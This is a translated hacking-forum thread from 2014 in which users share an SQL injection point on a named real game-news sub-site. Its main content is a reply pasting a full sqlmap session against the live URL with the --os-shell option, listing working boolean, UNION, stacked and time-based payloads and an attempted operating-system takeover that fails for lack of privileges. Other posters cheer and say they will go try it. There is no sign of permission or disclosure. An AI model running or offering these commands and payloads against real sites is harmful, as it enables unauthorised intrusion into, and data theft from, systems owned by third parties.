Original poster: 凡火火

An injection point on a 游戏风云 (Gamefy) sub-site

Posted on 2014-11-15 11:42:57
Mm, not bad vuo

Posted on 2014-11-15 12:15:38
How impressive = =!

Posted on 2014-11-15 12:19:30
Was this posted in the wrong board?

Posted on 2014-11-15 12:38:55
It's not root, so you get jack.

root@kali:~# sqlmap -u http://ls.gamefy.cn/detail.php?id=13 --os-shell

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:40:57

[12:40:58] [INFO] resuming back-end DBMS 'mysql'
[12:40:58] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13 AND 4788=4788

    Type: UNION query
    Title: MySQL UNION query (NULL) - 19 columns
    Payload: id=-4963 UNION ALL SELECT 48,48,48,48,48,48,48,48,48,CONCAT(0x7162676f71,0x414144674654756a6c51,0x71666c6c71),48,48,48,48,48,48,48,48,48#

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: id=13; SELECT SLEEP(5)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=13 AND SLEEP(5)
---
[12:40:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[12:40:58] [INFO] fingerprinting the back-end DBMS operating system
[12:40:58] [INFO] the back-end DBMS operating system is Linux
[12:40:58] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[12:41:03] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[12:41:04] [INFO] testing if current user is DBA
[12:41:04] [INFO] fetching current user
[12:41:04] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:41:04] [WARNING] functionality requested probably does not work because the curent session user is not a database administrator
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[12:41:07] [INFO] checking if UDF 'sys_eval' already exist
[12:41:08] [INFO] checking if UDF 'sys_exec' already exist
[12:41:08] [INFO] detecting back-end DBMS version from its banner
[12:41:08] [INFO] retrieving MySQL base directory absolute path
[12:41:14] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
[12:41:14] [ERROR] there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
do you want to proceed anyway? Beware that the operating system takeover will fail [y/N]

Posted on 2014-11-15 12:54:24
Let me see how it was broken through.

Posted on 2014-11-15 12:55:51
evil, supporting this...

Posted on 2014-11-15 13:55:12
Let me take a look at the injection point.

Posted on 2014-11-15 14:00:50
Coming to try it right away

Posted on 2014-11-15 14:03:40
Support, bumping for the original poster

Posted on 2014-11-15 14:47:58
Don't tell me it doesn't even have DB privileges?